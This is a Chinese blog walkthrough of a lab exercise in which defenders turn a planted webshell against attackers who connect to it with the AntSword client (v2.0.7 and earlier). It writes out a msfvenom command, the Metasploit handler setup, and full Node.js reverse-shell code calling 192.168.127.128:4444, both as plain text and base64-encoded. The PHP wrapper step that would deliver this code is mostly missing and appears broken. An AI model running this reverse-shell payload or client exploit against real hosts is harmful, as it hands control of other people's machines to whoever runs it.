蚁剑反制技术

<= v2.0.7 版本蚁剑反制

win2008模拟攻击队主机

win7上有yxcms 192.168.127.132

kali当做攻击队vps 192.168.127.128

假设进入后台后写入webshell

蚁剑反制技术_第1张图片

此时 攻击队使用蚁剑(<=v2.07)去连接 可以连接上

蚁剑反制技术_第2张图片

与此同时 防守方 通过查看web日志发现一直访问123.php 且为蚁剑流量

蚁剑反制技术_第3张图片

蓝队准备开始反制

生成反弹shell到vps的恶意js文件

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f raw -o payload.js

防守方vps开始监听4444端口

use exploit/multi/handler
set payload nodejs/shell_reverse_tcp
set lhost 192.168.127.128
set lport 4444
run

蚁剑反制技术_第4张图片

将恶意js文件中的内容base64编码

 (function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(4444, "192.168.127.128", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); })();

IChmdW5jdGlvbigpeyB2YXIgcmVxdWlyZSA9IGdsb2JhbC5yZXF1aXJlIHx8IGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUuY29uc3RydWN0b3IuX2xvYWQ7IGlmICghcmVxdWlyZSkgcmV0dXJuOyB2YXIgY21kID0gKGdsb2JhbC5wcm9jZXNzLnBsYXRmb3JtLm1hdGNoKC9ed2luL2kpKSA/ICJjbWQiIDogIi9iaW4vc2giOyB2YXIgbmV0ID0gcmVxdWlyZSgibmV0IiksIGNwID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLCB1dGlsID0gcmVxdWlyZSgidXRpbCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCg0NDQ0LCAiMTkyLjE2OC4xMjcuMTI4IiwgZnVuY3Rpb24oKSB7IGNsaWVudC5zb2NrZXQucGlwZShzaC5zdGRpbik7IGlmICh0eXBlb2YgdXRpbC5wdW1wID09PSAidW5kZWZpbmVkIikgeyBzaC5zdGRvdXQucGlwZShjbGllbnQuc29ja2V0KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50LnNvY2tldCk7IH0gZWxzZSB7IHV0aWwucHVtcChzaC5zdGRvdXQsIGNsaWVudC5zb2NrZXQpOyB1dGlsLnB1bXAoc2guc3RkZXJyLCBjbGllbnQuc29ja2V0KTsgfSB9KTsgc29ja2V0Lm9uKCJlcnJvciIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSkoKTs=

将下面代码中的payload替换为上面的base64字符串

");
?>

");
?>

最后将123.php文件中的内容替换为shell.php文件中的内容

蚁剑反制技术_第5张图片

替换完成后 攻击队在执行操作时 没有反应

蚁剑反制技术_第6张图片

当红队人员退出重新进入webshell后 连接不上 会报错

蚁剑反制技术_第7张图片

再看防守方vps 得到攻击队主机shell

蚁剑反制技术_第8张图片

蚁剑反制技术_第9张图片

你可能感兴趣的:(红蓝对抗,android,网络,安全,网络安全,网络协议)